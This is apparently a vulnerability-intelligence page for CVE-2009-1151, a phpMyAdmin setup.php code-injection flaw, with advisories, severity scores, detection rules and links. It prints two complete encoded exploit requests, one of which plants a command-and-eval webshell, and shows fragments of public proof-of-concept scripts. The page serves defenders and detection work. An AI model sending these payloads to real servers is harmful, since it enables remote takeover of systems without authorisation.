CVE-2009-1151
published 2009-03-26CVE-2009-1151: Static code injection vulnerability in setup.php in phpMyAdmin 2.11.x before 2.11.9.5 and 3.x before 3.1.3.1 allows remote attackers to inject arbitrary PHP…
PriorityP195critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOITInitial access
CISA Known Exploited Vulnerabilitydue 2022-04-15
Exploited in the wild
EPSS
95.44%
99.9th percentile
Static code injection vulnerability in setup.php in phpMyAdmin 2.11.x before 2.11.9.5 and 3.x before 3.1.3.1 allows remote attackers to inject arbitrary PHP code into a configuration file via the save action.
Affected
9 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | debian_linux | — | — |
| debian | debian_linux | — | — |
| debian | phpmyadmin | < phpmyadmin 4:3.1.3.1-1 (bookworm) | phpmyadmin 4:3.1.3.1-1 (bookworm) |
| phpmyadmin | phpmyadmin | >= 0 < 4:3.1.3.1-1 | 4:3.1.3.1-1 |
| phpmyadmin | phpmyadmin | >= 0 < 4:3.1.3.1-1 | 4:3.1.3.1-1 |
| phpmyadmin | phpmyadmin | >= 0 < 4:3.1.3.1-1 | 4:3.1.3.1-1 |
| phpmyadmin | phpmyadmin | >= 0 < 4:3.1.3.1-1 | 4:3.1.3.1-1 |
| phpmyadmin | phpmyadmin | >= 2.11.0 < 2.11.9.5 | 2.11.9.5 |
| phpmyadmin | phpmyadmin | >= 3.0.0 < 3.1.3.1 | 3.1.3.1 |
Detection & IOCsextracted from sources · hover to see the quote
commandaction=save&configuration=a:1:{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:23:%22host%27]=%27%27%3b%20phpinfo%28%29%3b//%22%3bs:9:%22localhost%22%3bs:9:%22extension%22%3bs:6:%22mysqli%22%3bs:12:%22connect_type%22%3bs:3:%22tcp%22%3bs:8:%22compress%22%3bb:0%3bs:9:%22auth_type%22%3bs:6:%22config%22%3bs:4:%22user%22%3bs:4:%22root%22%3b}}}&eoltype=unix↗
commandaction=save&configuration=a:1:{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:136:%22host%27%5d=%27%27%3b%20if($_GET%5b%27c%27%5d){echo%20%27%3cpre%3e%27%3bsystem($_GET%5b%27c%27%5d)%3becho%20%27%3c/pre%3e%27%3b}if($_GET%5b%27p%27%5d){echo%20%27%3cpre%3e%27%3beval($_GET%5b%27p%27%5d)%3becho%20%27%3c/pre%3e%27%3b}%3b//%22%3bs:9:%22localhost%22%3bs:9:%22extension%22%3bs:6:%22mysqli%22%3bs:12:%22connect_type%22%3bs:3:%22tcp%22%3bs:8:%22compress%22%3bb:0%3bs:9:%22auth_type%22%3bs:6:%22config%22%3bs:4:%22user%22%3bs:4:%22root%22%3b}}}&eoltype=unix↗
- →Detect follow-on webshell access via GET requests to /config/config.inc.php with query parameters 'c' (system command) or 'p' (eval payload), indicating successful exploitation and shell access. ↗
- →Detect the presence of /config/config.inc.php being accessible (HTTP 200) alongside a token in /scripts/setup.php — the exploit checks both conditions before proceeding. ↗
- →The Metasploit module targets URI /phpMyAdmin/scripts/setup.php and writes payload to /phpMyAdmin/config/config.inc.php; alert on creation or modification of config/config.inc.php under the phpMyAdmin web root. ↗
- →The exploit grabs a 32-character CSRF token from /scripts/setup.php before injecting; a sequence of GET then POST to /scripts/setup.php from the same source IP is a strong behavioral indicator. ↗
- ·The injected webshell payload is written to config/config.inc.php, which is not the active configuration file; the attacker must separately request that file to execute code. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
osv9.8CRITICAL
vulncheck9.8CRITICAL
cisa9.8CRITICAL
vendor_debian9.8CRITICAL
vendor_redhat9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
CISA
phpMyAdmin Remote Code Execution Vulnerability
cisa·2022-03-25·CVSS 9.8
CVE-2009-1151 [CRITICAL] CWE-94 phpMyAdmin Remote Code Execution Vulnerability
Vulnerability: phpMyAdmin Remote Code Execution Vulnerability
Affected: phpMyAdmin phpMyAdmin
Setup script used to generate configuration can be fooled using a crafted POST request to include arbitrary PHP code in generated configuration file.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2009-1151
Remediation Due Date: 2022-04-15
Debian
CVE-2009-1151: phpmyadmin - Static code injection vulnerability in setup.php in phpMyAdmin 2.11.x before 2.1...
vendor_debian·2009·CVSS 9.8
CVE-2009-1151 [CRITICAL] CVE-2009-1151: phpmyadmin - Static code injection vulnerability in setup.php in phpMyAdmin 2.11.x before 2.1...
Static code injection vulnerability in setup.php in phpMyAdmin 2.11.x before 2.11.9.5 and 3.x before 3.1.3.1 allows remote attackers to inject arbitrary PHP code into a configuration file via the save action.
Scope: local
bookworm: resolved (fixed in 4:3.1.3.1-1)
bullseye: resolved (fixed in 4:3.1.3.1-1)
forky: resolved (fixed in 4:3.1.3.1-1)
sid: resolved (fixed in 4:3.1.3.1-1)
trixie: resolved (fixed in 4:3.1.3.1-1)
Red Hat
phpMyAdmin: multiple security fixes in 3.1.3.1 (PMASA-2009-{1,2,3})
vendor_redhat·CVSS 9.8
CVE-2009-1151 [CRITICAL] phpMyAdmin: multiple security fixes in 3.1.3.1 (PMASA-2009-{1,2,3})
phpMyAdmin: multiple security fixes in 3.1.3.1 (PMASA-2009-{1,2,3})
Static code injection vulnerability in setup.php in phpMyAdmin 2.11.x before 2.11.9.5 and 3.x before 3.1.3.1 allows remote attackers to inject arbitrary PHP code into a configuration file via the save action.
GHSA
GHSA-fw5c-3235-cprv: Static code injection vulnerability in setup
ghsa_unreviewed·2022-05-02
CVE-2009-1151 [HIGH] CWE-94 GHSA-fw5c-3235-cprv: Static code injection vulnerability in setup
Static code injection vulnerability in setup.php in phpMyAdmin 2.11.x before 2.11.9.5 and 3.x before 3.1.3.1 allows remote attackers to inject arbitrary PHP code into a configuration file via the save action.
OSV
CVE-2009-1151: Static code injection vulnerability in setup
osv·2009-03-26·CVSS 9.8
CVE-2009-1151 [CRITICAL] CVE-2009-1151: Static code injection vulnerability in setup
Static code injection vulnerability in setup.php in phpMyAdmin 2.11.x before 2.11.9.5 and 3.x before 3.1.3.1 allows remote attackers to inject arbitrary PHP code into a configuration file via the save action.
VulnCheck
phpMyAdmin Remote Code Execution Vulnerability
vulncheck·2009·CVSS 9.8
CVE-2009-1151 [CRITICAL] CWE-94 phpMyAdmin Remote Code Execution Vulnerability
phpMyAdmin Remote Code Execution Vulnerability
Setup script used to generate configuration can be fooled using a crafted POST request to include arbitrary PHP code in generated configuration file.
Affected: phpMyAdmin phpMyAdmin
Required Action: Apply updates per vendor instructions.
Exploitation References: https://api.vulncheck.com/v3/index/sans-dshield?cve=CVE-2009-1151; https://blog.talosintelligence.com/2019/04/seaturtle.html; https://www.ic3.gov/Media/News/2022/220126.pdf; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://veriti.ai/blog/vulnerable-villain-when-hackers-get-hacked/; https://info.greynoise.io/hubfs/resources/GreyNoise-2025-Mass-Internet-Exploitation-Report.pdf
Exploit PoC: https://vulncheck.com/xdb/a8f294c1448e; https://vu
Suricata
ET WEB_SPECIFIC_APPS phpMyAdmin Remote Code Execution Proof of Concept (p=)
suricata·2010-07-30
CVE-2009-1151 ET WEB_SPECIFIC_APPS phpMyAdmin Remote Code Execution Proof of Concept (p=)
ET WEB_SPECIFIC_APPS phpMyAdmin Remote Code Execution Proof of Concept (p=)
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS phpMyAdmin Remote Code Execution Proof of Concept (p=)"; flow:established,to_server; http.uri; content:"/config/config.inc.php"; content:"p=phpinfo()"; reference:url,www.gnucitizen.org/blog/cve-2009-1151-phpmyadmin-remote-code-execution-proof-of-concept/; classtype:web-application-attack; sid:2010902; rev:7; metadata:created_at 2010_07_30, signature_severity Major, updated_at 2020_09_10, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
Suricata
ET WEB_SPECIFIC_APPS phpMyAdmin Remote Code Execution Proof of Concept (c=)
suricata·2010-07-30
CVE-2009-1151 ET WEB_SPECIFIC_APPS phpMyAdmin Remote Code Execution Proof of Concept (c=)
ET WEB_SPECIFIC_APPS phpMyAdmin Remote Code Execution Proof of Concept (c=)
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS phpMyAdmin Remote Code Execution Proof of Concept (c=)"; flow:established,to_server; http.uri; content:"/config/config.inc.php"; content:"c="; reference:url,www.gnucitizen.org/blog/cve-2009-1151-phpmyadmin-remote-code-execution-proof-of-concept/; classtype:web-application-attack; sid:2010903; rev:7; metadata:created_at 2010_07_30, signature_severity Major, updated_at 2020_09_10, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
Exploit-DB
phpMyAdmin - Config File Code Injection (Metasploit)
exploitdb·2010-07-03
CVE-2009-1151 phpMyAdmin - Config File Code Injection (Metasploit)
phpMyAdmin - Config File Code Injection (Metasploit)
---
##
# $Id: phpmyadmin_config.rb 9669 2010-07-03 03:13:45Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'PhpMyAdmin Config File Code Injection',
'Description' => %q{
This module exploits a vulnerability in PhpMyAdmin's setup
feature which allows an attacker to inject arbitrary PHP
code into a configuration file. The original advisory says
the vulnerability is present in phpMyAdmin versions 2.11.x
[
'Greg Ose', # Discovery
'pagvac', # milw0rm PoC
'egypt' # metasploit module
],
Exploit-DB
phpMyAdmin - 'pmaPWN!' Code Injection / Remote Code Execution
exploitdb·2009-06-22
CVE-2009-1151 phpMyAdmin - 'pmaPWN!' Code Injection / Remote Code Execution
phpMyAdmin - 'pmaPWN!' Code Injection / Remote Code Execution
---
1) {
print "|****************************************************************|\n";
print " pmaPWN.php - d3ck4, [email protected]\n";
print " phpMyAdmin Code Injection RCE Scanner & Exploit\n";
print " This is PHP version original http://milw0rm.com/exploits/8921\n";
print " credit: Greg Ose, pagvac @ gnucitizen.org\n";
print " greetz: Hacking Expose!, HM Security, darkc0de\n";
print "|****************************************************************|\n";
print "\n";
print "Usage: php $argv[0] \n";
exit;
}
print "|****************************************************************|\n";
print " pmaPWN.php - d3ck4, [email protected]\n";
print " phpMyAdmin Code Injection RCE Scanner & Exploit\n";
print " This is PHP
Exploit-DB
phpMyAdmin - '/scripts/setup.php' PHP Code Injection
exploitdb·2009-06-09·CVSS 9.8
CVE-2009-1151 [CRITICAL] phpMyAdmin - '/scripts/setup.php' PHP Code Injection
phpMyAdmin - '/scripts/setup.php' PHP Code Injection
---
#!/bin/bash
# CVE-2009-1151: phpMyAdmin '/scripts/setup.php' PHP Code Injection RCE PoC v0.11
# by pagvac (gnucitizen.org), 4th June 2009.
# special thanks to Greg Ose (labs.neohapsis.com) for discovering such a cool vuln,
# and to str0ke (milw0rm.com) for testing this PoC script and providing feedback!
# PoC script successfully tested on the following targets:
# phpMyAdmin 2.11.4, 2.11.9.3, 2.11.9.4, 3.0.0 and 3.0.1.1
# Linux 2.6.24-24-generic i686 GNU/Linux (Ubuntu 8.04.2)
# attack requirements:
# 1) vulnerable version (obviously!): 2.11.x before 2.11.9.5
# and 3.x before 3.1.3.1 according to PMASA-2009-3
# 2) it *seems* this vuln can only be exploited against environments
# where the administrator has chosen to install phpMyA
Nuclei
PhpMyAdmin Scripts - Remote Code Execution
nuclei·CVSS 9.8
CVE-2009-1151 [CRITICAL] PhpMyAdmin Scripts - Remote Code Execution
PhpMyAdmin Scripts - Remote Code Execution
PhpMyAdmin Scripts 2.11.x before 2.11.9.5 and 3.x before 3.1.3.1 are susceptible to a remote code execution in setup.php that allows remote attackers to inject arbitrary PHP code into a configuration file via the save action. Combined with the ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code.
Template:
id: CVE-2009-1151
info:
name: PhpMyAdmin Scripts - Remote Code Execution
author: princechaddha
severity: high
description: PhpMyAdmin Scripts 2.11.x before 2.11.9.5 and 3.x before 3.1.3.1 are susceptible to a remote code execution in setup.php that allows remote attackers to inject arbitrary PHP code into a configuration file via the save action. Combined with the ability to save files on server
Metasploit
PhpMyAdmin Config File Code Injection
metasploit
PhpMyAdmin Config File Code Injection
PhpMyAdmin Config File Code Injection
This module exploits a vulnerability in phpMyAdmin's setup feature which allows an attacker to inject arbitrary PHP code into a configuration file. The original advisory says the vulnerability is present in phpMyAdmin versions 2.11.x < 2.11.9.5 and 3.x < 3.1.3.1; this module was tested on 3.0.1.1. The file where our payload is written (phpMyAdmin/config/config.inc.php) is not directly used by the system, so it may be a good idea to either delete it or copy the running config (phpMyAdmin/config.inc.php) over it after successful exploitation.
Tenable
Sea Turtle DNS Hijacking Campaign Utilizes At Least Seven Patched Vulnerabilities
blogs_tenable·2019-04-19
Sea Turtle DNS Hijacking Campaign Utilizes At Least Seven Patched Vulnerabilities
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Talos
DNS Hijacking Abuses Trust In Core Internet Service
blogs_talos·2019-04-17
DNS Hijacking Abuses Trust In Core Internet Service
By Danny Adamitis, David Maynor, Warren Mercer, Matthew Olney and Paul Rascagneres.
Update 4/18: A correction has been made to our research based on feedback from Packet Clearing House, we thank them for their assistance
## Preface
This blog post discusses the technical details of a state-sponsored attack manipulating DNS systems. While this incident is limited to targeting primarily national security organizations in the Middle East and North Africa, and we do not want to overstate the consequences of this specific campaign, we are concerned that the success of this operation will lead to actors more broadly attacking the global DNS system. DNS is a foundational technology supporting the Internet. Manipulating that system has the potential to undermine the trust users have on the inter
Talos
DNS Hijacking Abuses Trust In Core Internet Service
blogs_talos·2019-04-17
DNS Hijacking Abuses Trust In Core Internet Service
## DNS Hijacking Abuses Trust In Core Internet Service
By Danny Adamitis , David Maynor , Warren Mercer , Matthew Olney and Paul Rascagneres . Update 4/18: A correction has been made to our research based on feedback from Packet Clearing House, we thank them for their assistance
## Preface
This blog post discusses the technical details of a state-sponsored attack manipulating DNS systems. While this incident is limited to targeting primarily national security organizations in the Middle East and North Africa, and we do not want to overstate the consequences of this specific campaign, we are concerned that the success of this operation will lead to actors more broadly attacking the global DNS system. DNS is a foundational technology supporting the Internet. Manipulating that system has t
http://labs.neohapsis.com/2009/04/06/about-cve-2009-1151/http://lists.opensuse.org/opensuse-security-announce/2009-04/msg00003.htmlhttp://phpmyadmin.svn.sourceforge.net/viewvc/phpmyadmin/branches/MAINT_2_11_9/phpMyAdmin/scripts/setup.php?r1=11514&r2=12301&pathrev=12301http://secunia.com/advisories/34430http://secunia.com/advisories/34642http://secunia.com/advisories/35585http://secunia.com/advisories/35635http://security.gentoo.org/glsa/glsa-200906-03.xmlhttp://www.debian.org/security/2009/dsa-1824http://www.gnucitizen.org/blog/cve-2009-1151-phpmyadmin-remote-code-execution-proof-of-concept/http://www.mandriva.com/security/advisories?name=MDVSA-2009:115http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.phphttp://www.securityfocus.com/archive/1/504191/100/0/threadedhttp://www.securityfocus.com/bid/34236https://www.exploit-db.com/exploits/8921http://labs.neohapsis.com/2009/04/06/about-cve-2009-1151/http://lists.opensuse.org/opensuse-security-announce/2009-04/msg00003.htmlhttp://phpmyadmin.svn.sourceforge.net/viewvc/phpmyadmin/branches/MAINT_2_11_9/phpMyAdmin/scripts/setup.php?r1=11514&r2=12301&pathrev=12301http://secunia.com/advisories/34430http://secunia.com/advisories/34642http://secunia.com/advisories/35585http://secunia.com/advisories/35635http://security.gentoo.org/glsa/glsa-200906-03.xmlhttp://www.debian.org/security/2009/dsa-1824http://www.gnucitizen.org/blog/cve-2009-1151-phpmyadmin-remote-code-execution-proof-of-concept/http://www.mandriva.com/security/advisories?name=MDVSA-2009:115http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.phphttp://www.securityfocus.com/archive/1/504191/100/0/threadedhttp://www.securityfocus.com/bid/34236https://www.exploit-db.com/exploits/8921https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2009-1151
2009-03-26
Published
2022-03-25
Added to CISA KEV
Exploited in the wild